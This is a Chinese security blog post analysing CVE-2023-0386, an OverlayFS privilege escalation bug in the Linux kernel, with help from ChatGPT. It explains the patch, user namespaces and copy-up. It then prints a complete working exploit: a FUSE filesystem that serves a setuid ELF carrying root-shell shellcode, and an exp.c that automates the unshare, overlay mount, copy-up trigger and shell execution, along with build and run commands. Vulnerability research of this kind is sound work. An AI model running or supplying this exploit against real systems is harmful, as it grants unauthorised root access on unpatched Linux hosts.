[漏洞分析] 使用chatGPT分析CVE-2023-0386 overlay内核提权
2023-6-19 11:11:31 Author: 白帽子程序员(查看原文) 阅读量:29 收藏




漏洞编号: CVE-2023-0386

漏洞产品: linux kernel - overlay文件系统

影响范围: 理论上5.11 ~ 5.19

利用条件: 可以unshar 或可以创建overlay文件系统

利用效果: 本地提权




准备漏洞版本范围内(除5.15版本)的内核开启overlay 和fuse 两个fs:



ubuntu 21.10 内核版本5.13.0-16-generic实测可以完成:



在漏洞分析开始前,我们先让chatGPT cosplay一下linux内核专家:







  1. static int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry,

  2. int flags)

  3. {

  4. int err;


  6. struct path parentpath;

  7. struct ovl_copy_up_ctx ctx = {

  8. .parent = parent,

  9. .dentry = dentry,

  10. .workdir = ovl_workdir(dentry),

  11. };

  12. if (WARN_ON(!ctx.workdir))

  13. return -EROFS;

  14. ovl_path_lower(dentry, &ctx.lowerpath);

  15. err = vfs_getattr(&ctx.lowerpath, &ctx.stat,//[1] 获取底层文件系统的stat


  17. if (err)

  18. return err;

  19. //[2]补丁新加判断文件的stat属性中的用户id和用户组id是否在当前命名空间有映射

  20. if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) ||

  21. !kgid_has_mapping(current_user_ns(), ctx.stat.gid))

  22. return -EOVERFLOW;

  1. 首先通过vfs_getattr函数获取底层文件系统目标文件的属性。vfs_getattr函数获通过传入一个文件的struct path结构来获取这个文件对应的struct stat结构


    1.2:struct stat结构存放文件的元数据信息,包括文件的属主属组等。而获取到的文件属主信息就会在下面补丁新加的判断中进行判断。

  2. 然后调用kuid_has_mapping函数对上面刚刚获取到的文件的属主信息和属组信息进行判断。判断目标文件属主和属组是否在当前用户命名空间中有映射。

    2.1:kuid_has_mapping函数传入两个参数,一个struct user_namespace用户命名空间结构体和一个struct kuid内核用户结构体,该函数会判断给定的用户信息是否在给定的用户命名空间中有映射,关于命名空间中用户的映射会在下文详细介绍。



  1. 如何触发目标函数ovl_copy_up_one所在的逻辑,即overlay文件系统中下层文件向上层拷贝?

  2. 判断属主是否被映射的文件lowerpath究竟在上面逻辑链中扮演什么角色?







其中漏洞补丁新增的判断函数kuid_has_mapping涉及的是上述7个命名空间中的用户命名空间(user namespace)


用户命名空间(User Namespace)用于隔离用户ID(UID)和组ID(GID)。通过用户命名空间,可以在不同命名空间中使用独立的用户和组ID集合。这意味着,在一个用户命名空间中的用户和组可能在另一个命名空间中具有不同的ID或权限。用户命名空间可以提高系统的安全性和可管理性,尤其在容器化环境中。

用户命名空间的关键特性就是ID映射:用户命名空间允许将一个命名空间中的UID和GID映射到另一个命名空间中的UID和GID。这意味着,在不同的用户命名空间中,相同的UID和GID可能代表不同的用户和组。例如,一个容器中的root用户(UID 0)可能在主系统中被映射为一个非特权用户。


  • 同一个用户(组),在不同用户命名空间中的uid(gid)不同

  • 创建新用户命名空间(做这个创建动作)的用户在新用户命名空间中是root

  • 其他用户需要手动映射到新用户空间(修改/proc/[pid]/uid_map;/proc/[pid]/gid_map),这个操作通常需要有初始命名空间中的root权限

  • 没有映射的用户会被识别为nobody



所以到这里我们就知道这个补丁的意义了: 对于拷贝的目标overlay 下层文件系统的文件,必须其属主(组)用户(组)在当前命名空间中有映射,才会继续下面的拷贝动作,否则返回错误。 也就是说这种被识别为nobody的情况就会造成拷贝失败。




Overlay 文件系统(又称为 OverlayFS)是一个 Linux 内核的虚拟文件系统。它允许将两个或多个已存在的目录层次结构(称为“lower”和“upper”层)合并成一个统一的视图。Overlay 文件系统在只读文件系统(如镜像)上实现写入操作的能力时非常有用,因为它可以将写操作重定向到一个叠加的可写层。这种方法在容器技术(如 Docker)中得到广泛应用,因为它提供了一种轻量级、高性能的文件系统虚拟化方案。

  1. Lower 层:这是基础文件系统层,通常是只读的。一个 Overlay 文件系统可以有一个或多个 lower 层。

  2. Upper 层:这是一个可写的文件系统层,它存储所有对 lower 层文件的更改。这包括文件修改、创建和删除操作。

  3. Workdir:这是一个与 upper 层在同一文件系统中的可写目录,用于存储一些中间数据和元数据,以支持 OverlayFS 的正常运行。

  4. Merged 层:这是一个虚拟的、合成的视图,它将 lower 层和 upper 层合并在一起。当用户访问 Overlay 文件系统时,他们看到的是这个 merged 层。在这个层中,来自 upper 层的更改会覆盖 lower 层的相应文件。对于同名文件,upper 层中的文件优先级更高。对于同名目录,则合并,只判断目录中的文件是否有上下层覆盖屏蔽关系。


由于上层文件系统是可写的,所以用户修改来自上层的文件时则直接修改。但如果用户想要修改下层文件系统中的文件,如上图中的file D,由于下层文件系统是只读的,则会将file D拷贝(copy up)到上层变成file D‘然后再进行修改操作,实际修改的是拷贝到上层的file D’,而下层文件系统中的file D本身不会被改变,这也是overlay文件系统中的COW(copy on write 写时复制):




首先,我们需要创建 lower1、lower2、upper 和 work 目录。这些目录将用于 Overlay 文件系统。同时,我们还需要创建一个挂载点(例如,merged)来访问合并后的视图。并向 lower1 和 lower2 目录中添加一些内容:

  1. mkdir lower1 lower2 upper work merged

  2. echo "This is a file in lower1." > lower1/file1.txt

  3. echo "This is a file in lower2." > lower2/file2.txt

使用 mount 命令和 -t overlay 选项来挂载 Overlay 文件系统。您需要指定 lowerdir、upperdir 和 workdir 参数,如下所示:

  1. mount -t overlay overlay -o lowerdir=lower1:lower2,upperdir=upper,workdir=work merged






经过上面的分析,我们基本可以复原出漏洞的全貌,如果一个overlay文件系统发生了copy up操作(尝试修改下层文件,触发下层文件向上层拷贝)的时候:

  • 补丁的逻辑:我们不能拷贝还没有在当前用户命名空间映射的用户(组)属主(组)的文件

  • 漏洞的逻辑:所有文件都可以正常拷贝,包括没有在当前用户命名空间中映射的用户属主文件。




其实上面问题的答案很简单,拷贝文件并不只是拷贝文件的内容,包括文件的元数据,也就是文件的属主信息、时间戳、权限信息、还有扩展信息如capbilities等都会一起拷贝过来。引发的风险就是,如果下层文件系统是一个用户文件系统(如fuse),用户高度可控,可以自定义任何文件,但该文件系统存在限制(如nosuid),那么本漏洞就允许将下层用户自定义的suid文件从一个nosuid 文件系统拷贝到一个正常文件系统中,导致非法的suid文件获得suid特权。进而造成提权。



FUSE(Filesystem in Userspace)是一种文件系统接口,允许用户在用户空间(而非内核空间)实现和运行自定义的文件系统。FUSE 设计的目的是简化文件系统的开发和部署,同时提供良好的性能和安全性。FUSE 在 Linux 和其他类 Unix 系统(如 macOS 和 FreeBSD)上广泛使用。





  1. #define FUSE_USE_VERSION 30

  2. #include <fuse.h>

  3. #include <stdio.h>

  4. #include <stdlib.h>

  5. #include <string.h>

  6. #include <errno.h>

  7. static const char *hello_path = "/hello";//fuse文件系统中有一个名为hello的文件,这里是文件路径

  8. const char hello_str[] = {//fuse文件系统中的suid 后门文件的二进制内容

  9. 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00,

  10. 0x00, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00,

  11. 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,

  12. 0xb0, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,

  13. 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  14. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  15. 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,

  16. 0x02, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,

  17. 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,

  18. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  19. 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,

  20. 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,

  21. 0xf6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  22. 0xf6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  23. 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  24. 0x51, 0xe5, 0x74, 0x64, 0x07, 0x00, 0x00, 0x00,

  25. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  26. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  27. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  28. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  29. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  30. 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  31. 0x31, 0xff, 0x31, 0xd2, 0x31, 0xf6, 0x6a, 0x75,

  32. 0x58, 0x0f, 0x05, 0x31, 0xff, 0x31, 0xd2, 0x31,

  33. 0xf6, 0x6a, 0x77, 0x58, 0x0f, 0x05, 0x6a, 0x68,

  34. 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f,

  35. 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72,

  36. 0x69, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01,

  37. 0x01, 0x01, 0x31, 0xf6, 0x56, 0x6a, 0x08, 0x5e,

  38. 0x48, 0x01, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31,

  39. 0xd2, 0x6a, 0x3b, 0x58, 0x0f, 0x05};

  40. static int hellofs_getattr(const char *path, struct stat *stbuf)//获取文件或目录的属性信息的回调函数getattr

  41. {

  42. int res = 0;

  43. memset(stbuf, 0, sizeof(struct stat));

  44. if (strcmp(path, "/") == 0) {//fuse文件系统根目录的权限,0755

  45. stbuf->st_mode = S_IFDIR | 0755;

  46. stbuf->st_nlink = 2;

  47. } else if (strcmp(path, hello_path) == 0) {//hello文件的权限,777并且带有SUID

  48. stbuf->st_mode = S_IFREG | S_ISUID | 0777;

  49. stbuf->st_nlink = 1;

  50. stbuf->st_size = sizeof(hello_str); //hello文件实际大小

  51. } else {

  52. res = -ENOENT;

  53. }

  54. return res;

  55. }

  56. static int hellofs_readdir(const char *path, void *buf, fuse_fill_dir_t filler,

  57. off_t offset, struct fuse_file_info *fi)//获取目录信息的函数

  58. {

  59. (void) offset;

  60. (void) fi;

  61. if (strcmp(path, "/") != 0) {//目前只支持查看fuse的根目录

  62. return -ENOENT;

  63. }

  64. filler(buf, ".", NULL, 0);//默认显示.和..

  65. filler(buf, "..", NULL, 0);

  66. filler(buf, hello_path + 1, NULL, 0);//fuse根目录有一个hello文件

  67. return 0;

  68. }

  69. static int hellofs_open(const char *path, struct fuse_file_info *fi)//打开文件的open回调函数

  70. {

  71. if (strcmp(path, hello_path) != 0) {//只支持打开hello文件

  72. return -ENOENT;

  73. }

  74. return 0;

  75. }

  76. static int hellofs_read(const char *path, char *buf, size_t size, off_t offset,

  77. struct fuse_file_info *fi)//读文件的回调函数read

  78. {

  79. size_t len;

  80. (void) fi;

  81. if(strcmp(path, hello_path) != 0) {//只支持读hello文件

  82. return -ENOENT;

  83. }

  84. len = sizeof(hello_str);

  85. if (offset < len) {

  86. if (offset + size > len) {

  87. size = len - offset;

  88. }

  89. memcpy(buf, hello_str + offset, size);//返回hello文件的内容,即上面的二进制数组

  90. } else {

  91. size = 0;

  92. }

  93. return size;

  94. }

  95. static struct fuse_operations hellofs_oper = {//只实现上述四个回调函数已经够了

  96. .getattr = hellofs_getattr,

  97. .readdir = hellofs_readdir,

  98. .open = hellofs_open,

  99. .read = hellofs_read,

  100. };

  101. int main(int argc, char *argv[])

  102. {

  103. return fuse_main(argc, argv, &hellofs_oper, NULL);//注册回调函数

  104. }


  1. gcc -Wall hellofs.c `pkg-config fuse --cflags --libs` -o hellofs

  2. mkdir fusefs

  3. ./hellofs ./fusefs


但是普通用户无法开启suid挂载fuse文件系统,也就是说普通用户挂载的fuse文件系统都是nosuid的。 所以现在即便执行这个suid 的后门文件,我们也无法获得root的权限:



1. 首先我们需要根据漏洞场景构造出一个overlay文件系统,使用fuse文件系统作为下层文件系统,找一个我们可写的目录作为上层文件系统,先创建出workdir等overlay相关目录,并挂载fuse文件系统

  1. mkdir hello_mount_point overlay_mount_point upperdir workdir #创建相关目录

  2. ./hellofs hello_mount_point #挂载fuse文件系统

    2. 然后创建一个新的用户命名空间和mount命名空间还有pid命名空间,因为我们接下来需要创建overlay文件系统,默认情况下我们没有mount权限,所以需要在新的命名空间中获得mount的权限

    1. unshare -Urm

    3. 创建overlay文件系统,使用上面的携带suid后门文件hello的fuse文件系统作为下层,上层就是我们可写的upper目录:

    1. mount-toverlayoverlay-olowerdir=hello_mount_point,upperdir=upperdir,workdir=workdiroverlay_mount_point


现在我们的目标就是利用漏洞,将suid后门文件从nosuid挂载的fuse文件系统中拷贝到upper文件系统中,upper文件系统是操作系统的默认文件系统,是有suid的,这个操作会将后门文件连同他的suid属性一并拷贝过来。所以我们目前需要触发overlay文件系统的copy up操作,该操作通常是在我们尝试修改下层文件时触发的,这也是我们在fuse文件系统中将hello文件权限设置为777的原因。


其实修改文件并不只是指修改文件内容,对于文件的其他属性的修改,比如文件时间戳等,也会触发copy up操作。而touch 命令在尝试创建一个已经存在的文件的时候不会覆盖已经存在的文件,而是只修改文件的访问时间和修改时间的时间戳,而时间戳信息也算文件的attr扩展信息,该信息被修改同样会触发overlay文件系统的向上拷贝。

调用栈如下,由于修改了文件的访问和修改时间戳,在ovl_setattr中触发了向上拷贝copy up:

  1. 所以回到上面的操作步骤之中,我们只需要进入overlay文件系统的merge目录,使用touch修改后门文件hello的时间戳即可:

    1. touch overlay_mount_point/hello

然后这里已经触发了copy up:


  1. ls -al upperdir

5.然后退出命名空间执行upperdir/hello即可获得root shell:



  1. #define FUSE_USE_VERSION 30

  2. #include <fuse.h>

  3. #include <stdio.h>

  4. #include <stdlib.h>

  5. #include <string.h>

  6. #include <errno.h>

  7. static const char *hello_path = "/hello";

  8. const char hello_str[] = {

  9. 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00,

  10. 0x00, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00,

  11. 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,

  12. 0xb0, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,

  13. 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  14. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  15. 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,

  16. 0x02, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,

  17. 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,

  18. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  19. 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,

  20. 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,

  21. 0xf6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  22. 0xf6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  23. 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  24. 0x51, 0xe5, 0x74, 0x64, 0x07, 0x00, 0x00, 0x00,

  25. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  26. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  27. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  28. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  29. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  30. 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

  31. 0x31, 0xff, 0x31, 0xd2, 0x31, 0xf6, 0x6a, 0x75,

  32. 0x58, 0x0f, 0x05, 0x31, 0xff, 0x31, 0xd2, 0x31,

  33. 0xf6, 0x6a, 0x77, 0x58, 0x0f, 0x05, 0x6a, 0x68,

  34. 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f,

  35. 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72,

  36. 0x69, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01,

  37. 0x01, 0x01, 0x31, 0xf6, 0x56, 0x6a, 0x08, 0x5e,

  38. 0x48, 0x01, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31,

  39. 0xd2, 0x6a, 0x3b, 0x58, 0x0f, 0x05};

  40. static int hellofs_getattr(const char *path, struct stat *stbuf)

  41. {

  42. int res = 0;

  43. memset(stbuf, 0, sizeof(struct stat));

  44. if (strcmp(path, "/") == 0) {

  45. stbuf->st_mode = S_IFDIR | 0755;

  46. stbuf->st_nlink = 2;

  47. } else if (strcmp(path, hello_path) == 0) {

  48. stbuf->st_mode = S_IFREG | S_ISUID | 0777;

  49. stbuf->st_nlink = 1;

  50. stbuf->st_size = sizeof(hello_str); // zero-size file

  51. } else {

  52. res = -ENOENT;

  53. }

  54. return res;

  55. }

  56. static int hellofs_readdir(const char *path, void *buf, fuse_fill_dir_t filler,

  57. off_t offset, struct fuse_file_info *fi)

  58. {

  59. (void) offset;

  60. (void) fi;

  61. if (strcmp(path, "/") != 0) {

  62. return -ENOENT;

  63. }

  64. filler(buf, ".", NULL, 0);

  65. filler(buf, "..", NULL, 0);

  66. filler(buf, hello_path + 1, NULL, 0);

  67. return 0;

  68. }

  69. static int hellofs_open(const char *path, struct fuse_file_info *fi)

  70. {

  71. if (strcmp(path, hello_path) != 0) {

  72. return -ENOENT;

  73. }

  74. return 0;

  75. }

  76. static int hellofs_read(const char *path, char *buf, size_t size, off_t offset,

  77. struct fuse_file_info *fi)

  78. {

  79. size_t len;

  80. (void) fi;

  81. if(strcmp(path, hello_path) != 0) {

  82. return -ENOENT;

  83. }

  84. len = sizeof(hello_str);

  85. if (offset < len) {

  86. if (offset + size > len) {

  87. size = len - offset;

  88. }

  89. memcpy(buf, hello_str + offset, size);

  90. } else {

  91. size = 0;

  92. }

  93. return size;

  94. }

  95. static struct fuse_operations hellofs_oper = {

  96. .getattr = hellofs_getattr,

  97. .readdir = hellofs_readdir,

  98. .open = hellofs_open,

  99. .read = hellofs_read,

  100. };

  101. int main(int argc, char *argv[])

  102. {

  103. if(argc < 2)

  104. {

  105. printf("./exp dir(dir that you can write and not mount by nosuid)\n");

  106. exit(-1);

  107. }

  108. char fuse_dir[0x1000];

  109. strcpy(fuse_dir, argv[1]);

  110. strcat(fuse_dir, "/testfuse");

  111. char command[0x1000] = "mkdir ";

  112. strcat(command, fuse_dir);

  113. system(command);

  114. char * fusedir[] = {"exp", fuse_dir};

  115. if(!fork())

  116. {

  117. fuse_main(2,fusedir , &hellofs_oper, NULL);

  118. }

  119. char up_dir[0x1000];

  120. strcpy(up_dir, argv[1]);

  121. strcat(up_dir, "/updir");

  122. strcpy(command, "mkdir ");

  123. strcat(command, up_dir);

  124. system(command);

  125. char ol_dir[0x1000];

  126. strcpy(ol_dir, argv[1]);

  127. strcat(ol_dir, "/overlaydir");

  128. strcpy(command, "mkdir ");

  129. strcat(command, ol_dir);

  130. system(command);

  131. char work_dir[0x1000];

  132. strcpy(work_dir, argv[1]);

  133. strcat(work_dir, "/workdir");

  134. strcpy(command, "mkdir ");

  135. strcat(command, work_dir);

  136. system(command);

  137. //unshare -Urm /bin/sh -c '{ mount -t overlay overlay -o lowerdir=/tmp/testfuse,upperdir=/tmp/updir,workdir=/tmp/workdir /tmp/overlaydir; touch /tmp/overlaydir/hello'; }'

  138. strcpy(command, "unshare -Urm /bin/sh -c '{ mount -t overlay overlay -o lowerdir=");

  139. strcat(command, fuse_dir);

  140. strcat(command, ",upperdir=");

  141. strcat(command, up_dir);

  142. strcat(command, ",workdir=");

  143. strcat(command, work_dir);

  144. strcat(command, " ");

  145. strcat(command, ol_dir);

  146. strcat(command, "; touch ");

  147. strcat(command, ol_dir);

  148. strcat(command, "/hello; }'");

  149. system(command);

  150. ///tmp/updir/hello

  151. strcpy(command, up_dir);

  152. strcat(command, "/hello");

  153. system(command);

  154. return 0;

  155. }


  1. gcc -Wall exp.c `pkg-config fuse --cflags --libs` -o exp

  2. ./exp /tmp








终端云漏洞奖励翻倍活动 夏日冰爽到来!挖呀挖呀挖!



Git CVE-2022-39253 漏洞分析与复现


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3Mjc0MDQ2Nw==&mid=2247492704&idx=1&sn=59c5f912828ac98d223861e070d7174b&chksm=cee8077cf99f8e6ac2ee109d4e9254056efdf472ec59579f9275f9e64e4d95353e79b49bf859#rd